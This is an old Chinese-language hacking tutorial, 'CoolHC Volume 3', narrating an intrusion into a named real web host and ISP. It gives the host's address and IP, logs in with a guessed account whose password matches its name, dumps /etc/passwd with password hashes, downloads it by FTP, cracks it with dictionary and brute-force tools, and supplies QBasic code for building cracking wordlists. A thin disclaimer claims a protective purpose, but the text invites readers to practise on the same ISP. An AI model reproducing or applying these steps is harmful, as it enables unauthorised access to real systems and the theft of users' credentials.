coolfire教学文章三

/ns/cn/jc/data/20010129102837.htm

CoolHC Volume 3 By CoolFire Author E-Mail: coolfires@hotmail.com

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写 这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件 导致恶意入侵别人的电脑或网路, 本人概不负责 !!

前几次说到了 Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用 的客户不就糗大了! 但是 CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的 W3 密码, 误入一个号称第一个提供网路拨接的 ISP, 且在 CoolFire 顺利的抓回 /etc/passwd 之後, 使用了自己 写的 PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了 9 组 ID 与 Password 相同的密码,
勿怪我没有在这里提醒大家, 还好我没有找到 root password, 不然可能该系统就此停摆, 不可再见天日也! (当然我不可能这么作啦!).

看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上 CoolFire 最近开会的时候遇到的情 况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时 候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业 溃! 大家要小心呀 !
ISP 是一般 User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导 User 正确 的网路使用观念 (Password 的设定及 proxy 的使用等), 实在不敢想像这样的网路发展到几年後会是甚么样子 ??

这一次的说明还是没有谈到新的技巧, 在 James 将首页更新後各位应该已经可以从中学到许多东 西了, 如果想要学习入侵, 就一定要知道最新的资讯 (入侵本国的网路则不用, 反正没人重视网路 安全..... 真失望), 在别人还没将 Bug 修正之前就抢先一步拿到 /etc/passwd, 所以订阅一些网路安全 的 Mail List 是必要的, 多看一些网安有关的 News Group 也是必要的 (不仅 Hacker 如此, ISP 更要
多注意这些资讯!). 日後有空再整里一些 Mail List 给大家 !!

本次主题: 说明如何连接该 ISP 并且对其 /etc/passwd 解码
连接位址: www.coffee.com.tw (203.66.169.11)
特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以 CoolFire 已经 Mail 给该网页之维 护人员更改密码, 但该网页之 ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护 人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!

Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 请速更动网页密码
From: CoolFire <coolfires@hotmail.com>

你的网页作得不错, 但是因为你所设定的密码太容易为骇客所
? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次
若网页遭到篡改, 本人概不负责!!

**** 课程开始 ****

请注意: 由於本次所作的课程内容以实作为主, 除了本人 IP 有所更改, 一切都使用本人所用之
Telnet 软体 Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!

(连线到某一主机之後.... 此处的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is '^]'.
Password: (随便按一下 Enter)
Login incorrect

www login: coffee (以 Hacker 的敏锐判断 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

欢 迎 光 临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧!
=================================================================

(直接进入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
hosts.deny ppp/

(看看我们的目标长得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash

(CoolFire 注: 因为使用 PaSs2DiC 很容易找出 ID 与 Password 相同的. 故除了 Coffee 外, 其
它我找到密码的 EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)

www:/etc$ exit
logout
Connection closed by foreign host.

(可以走了 !! 改用 FTP 将 /etc/passwd 给抓回来吧!)

ms.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
220-
220- 欢 迎 光 临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧!
220-
220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

(还是使用刚刚的帐号进入)

Name (www.coffee.com.tw:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

(直接到达档案放置地点)

ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
issue
motd
mtools
profile
securetty
shells
termcap
skel
csh.cshrc
csh.login
lilo
inet
default
services
HOSTNAME
DIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
at.deny
fs
magic
rc.d
syslog.conf
printcap
inittab
sudoers
vga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
gateways
bootptab
exports
ftpusers
host.conf
hosts
hosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot
networks
nntpserver
protocols
resolv.conf
rpc
ftpaccess
hosts.lpd
ftpconversions
snooptab
msgs
ftpgroups
slip.login
slip.hosts
yp.conf.example
X11
lilo.conf
sendmail.cf
fstab
fastboot
mtab
syslog.pid
klogd.pid
shutdownpid
localtime
passwd.old
ioctl.save
psdevtab
ftp.banner
ftp.deny
issue.net
motd.bak
securetty.old
226 Transfer complete.

(取回该档案)

ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(尽速离开)

ftp> bye
221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧 !!
快点跑一下, 让它自动产生字典档案:

C:\hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:\hack>

(这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 Brute Force 看看!)


C:\hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine. v2.0
Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐


Attempts/Hits: 5184/9


Taking list input from dic.cfe
Beginning search of passwd for password: xxx

Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
Match for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
Match for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx

Done.

C:\hack>

看! 除了 coffee 外还是有许多人使用与 ID 相同的字作为密码, 实在是....@#$%^...&* 因某些关系 所以其它部份要被 "马赛克" 起来, 请各位读者见量!

**** 再谈密码 ****

看了以上的破解示范, 就可以 解到许多人还是对於 "密码" 这东西不是很有 "密码" 的观念, 人就是 那么的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用 QBasic 来设计 一个自动产生密码的小程式, 相信对许多人有很大的帮助, 底下我们再来浅显的介绍一下字母密码的 产生方法, 相信对於你在 Hack 某站会有更大的帮助.

事情的开始是有一位网友 mail 给我, 问我字典档要如何写程式来 "自动扩大", 而让我有了写这一段的 想法, 现在我就针对这位网友的问题作一个更详细的说明 (因已简短回信答覆), 并且写出来让大家 解一下, 当然我们的示范还是使用 QBasic, 因为这是最容易找到的程式了, 而且语法大家也可能会比较熟悉一点, 如果我使用 VB 或 C 来写, 可能有些人只会拿去用, 而不会去修改或者写个好一点的出来!

先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式, 所以我们要 解字的字母排 列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:

[1] apple [2] guest [3] james [4] superman [5] password

OK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧 ! 我们首先这样说明: 母音在英文 上有 : A E I O U 这五个, 所有的英文单字都会有这些母音 (有些没有的可能是专有名词或缩写), 也有可 能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等, 再来就是比较每个字的开头, 有可能是母音, 也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是两个子音再接一个母 音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st, sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e; est; ord; ard; ls; es; s... 等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了 !! 我大略写一个简单的, 其它大家自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧 !!

底下就是该程式片段, 执行後会产生 MyDic.Txt 档, 大小为: 22,096 Bytes 共有 3120 个字的字典!!

--------------- MakeDic.BAS Start Here ---------------------------------------------------------------------------------------
DIM FirstWord$(20)
DIM MotherWord$(13)
DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s", "t", "p", "k" , "f", "m", "n", "b","k"
DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I

FOR I = 1 TO 13
READ MotherWord$(I)
NEXT I

FOR I = 1 TO 12
READ LastWord$(I)
NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20
FOR J = 1 TO 13
FOR K = 1 TO 12
PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
NEXT K
NEXT J
NEXT I

CLOSE : END
--------------- Cut Here, End of MakeDic.BAS --------------------------------------------------------------------------------

当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如: 子音+母音+子音+母音+子音, 作 出来的字典档会很吓人喔 !! 这一个部份就讲到这里了 ! 如果你有很棒的字典产生程式, 写好了请 Mail 一 份给我喔 !! 如果可以的话请说明是否可以公布在我的 W3 上让其它人下载 !! 还是你只是要给我 ?!

希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看, 如果有相同的请 赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗 ??? 咖啡业者...... ISP 们.... 教教你们的使用者 吧..... 唉~~~~